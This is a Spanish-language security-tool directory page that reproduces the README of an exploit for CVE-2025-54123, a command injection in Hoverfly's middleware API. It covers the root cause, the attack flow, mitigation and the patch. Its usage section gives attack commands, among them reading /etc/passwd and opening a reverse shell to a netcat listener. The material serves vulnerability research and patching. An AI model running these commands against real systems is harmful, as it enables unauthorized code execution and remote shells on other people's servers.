Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — Exploit para CVE-2025-54123, una inyección de comandos del sistema operativo autenticada en la API de middleware de Hoverfly, que proporciona capacidades de solo verificación, comando único, shell interactivo y shell inversa para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlPapers e InvestigaciónAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

Exploit para CVE-2025-54123, una inyección de comandos del sistema operativo autenticada en la API de middleware de Hoverfly, que proporciona capacidades de solo verificación, comando único, shell interactivo y shell inversa para pruebas de seguridad autorizadas.

Ver Repositorio
13hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54123 — Ejecución Remota de Código en la API Middleware de Hoverfly

RCE autenticado mediante inyección de comandos del SO en Hoverfly ≤ 1.11.3

Resumen de la Vulnerabilidad

PropiedadValor
CVE IDCVE-2025-54123
CVSS Score9.8 — Crítico
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (Inyección de comandos del SO), CWE-20 (Validación de entrada incorrecta)
ProductoHoverfly — Herramienta de simulación de API de código abierto
AfectadasTodas las versiones hasta e incluyendo 1.11.3
Corregido en1.12.0 (commit del parche)
AvisoGHSA-r4h8-hfp2-ggmf

Análisis Técnico

Aquí hay un análisis detallado del caso de estudio y análisis técnico desde perspectivas de caja blanca y caja negra https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

Superficie de Ataque

Hoverfly expone una API administrativa RESTful (puerto predeterminado 8888) para gestionar configuraciones de simulación. El endpoint de gestión de middleware en /api/v2/hoverfly/middleware acepta un cuerpo JSON con los campos binary y script que definen un proceso middleware externo.

Causa Raíz

La vulnerabilidad surge de una combinación de tres fallos a nivel de código:

  1. Validación de entrada insuficiente — middleware.go:93-96: La función SetBinary() acepta el parámetro binary sin ninguna validación o sanitización, permitiendo a un atacante especificar ejecutables arbitrarios (por ejemplo, bash).

  2. Ejecución insegura de comandos — local_middleware.go:14-19: El middleware se ejecuta mediante exec.Command() con los valores binary y script controlados por el atacante pasados directamente como argumentos, permitiendo la inyección de comandos del SO.

  3. Ejecución inmediata durante las pruebas — hoverfly_service.go:173: Cuando se establece el middleware a través de la API, Hoverfly prueba inmediatamente el middleware ejecutándolo, desencadenando el comando inyectado en el momento de la configuración en lugar de en el momento de la interceptación del proxy.

Flujo del Ataque

root@kitploit:~
Attacker                              Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) Authenticate
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) Inject payload
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) Immediate execution
   │    │ → attacker command runs as       ││
   │    │   the Hoverfly process user      ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── Command output in error response ──│  (4) Exfiltrate output
   │                                        │

Uso del Exploit

Requisitos Previos

  • Python 3.8+
  • Credenciales válidas para la API administrativa de Hoverfly (por defecto: admin / contraseña configurable)

Instalación

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

Modos de Operación

Modo Solo Verificación

Verifica la accesibilidad del objetivo y la autenticación sin explotación:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -C

Ejecución de un Solo Comando

Ejecuta un solo comando del SO en el objetivo:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'id'

Pseudo-Shell Interactiva

Inicia una sesión de shell persistente:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -i

Shell Inversa

Envía una shell inversa a tu listener:

root@kitploit:~
# Terminal 1 — start listener
nc -lvnp 4444

# Terminal 2 — launch exploit
python3 exploit.py -u http://target:8888 -U admin -P <password> --revshell 10.0.0.1:4444

Modo Verboso con Proxy

Enruta el tráfico a través de Burp Suite para inspección:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'cat /etc/passwd' --proxy -v

Referencia Completa de Parámetros

ParámetroDescripciónPor defecto
-u, --urlURL objetivo de HoverflyObligatorio
-U, --usernameNombre de usuario administradorObligatorio
-P, --passwordContraseña de administradorObligatorio
-c, --commandComando del SO a ejecutar—
-C, --checkModo solo verificación (sin explotación)false
-i, --interactivePseudo-shell interactivafalse
--revshellShell inversa LHOST:LPORT—
--proxyEnrutar a través de 127.0.0.1:8080false
--timeoutTiempo de espera de la solicitud (segundos)15
-v, --verboseHabilitar salida verbosafalse

Mitigación

AcciónDetalles
ActualizarActualizar Hoverfly a v1.12.0 o posterior, donde la API de establecimiento de middleware está deshabilitada por defecto
Segmentación de redRestringir el acceso a la API administrativa de Hoverfly (puerto 8888) solo a redes confiables
AutenticaciónUsar contraseñas fuertes y únicas para la API administrativa de Hoverfly
MonitoreoMonitorear solicitudes PUT inesperadas a /api/v2/hoverfly/middleware

Detalles del Parche

La corrección en el commit 17e60a9 deshabilita la API de establecimiento de middleware por defecto. Los cambios posteriores en la documentación (commit a9d4da7) informan a los usuarios sobre las implicaciones de seguridad de exponer este endpoint.


Referencias

  • NVD — CVE-2025-54123
  • Aviso de Seguridad de GitHub — GHSA-r4h8-hfp2-ggmf
  • Código vulnerable — hoverfly_service.go#L173
  • Código vulnerable — middleware.go#L93
  • Código vulnerable — local_middleware.go#L13
  • Commit del parche — 17e60a9

Descargo de Responsabilidad

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas e investigación educativa. El acceso no autorizado a sistemas informáticos es ilegal según la Computer Fraud and Abuse Act (CFAA) y leyes equivalentes en todo el mundo. El autor no asume ninguna responsabilidad por el mal uso de este software. Obtenga siempre un permiso explícito por escrito antes de probar cualquier sistema que no posea.


Estructura del Proyecto

root@kitploit:~
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # Polished exploit
│   └── raw_exploit.py      # Original raw PoC
├── Images/                 # Research screenshots
├── Reference/              # Reference exploits for study
├── requirements.txt        # Python dependencies
└── README.md               # This file

Autor

Phantom Hat — Investigador de Seguridad


Esta investigación se llevó a cabo como parte de un estudio de caso de vulnerabilidad con fines educativos.

Descargar herramienta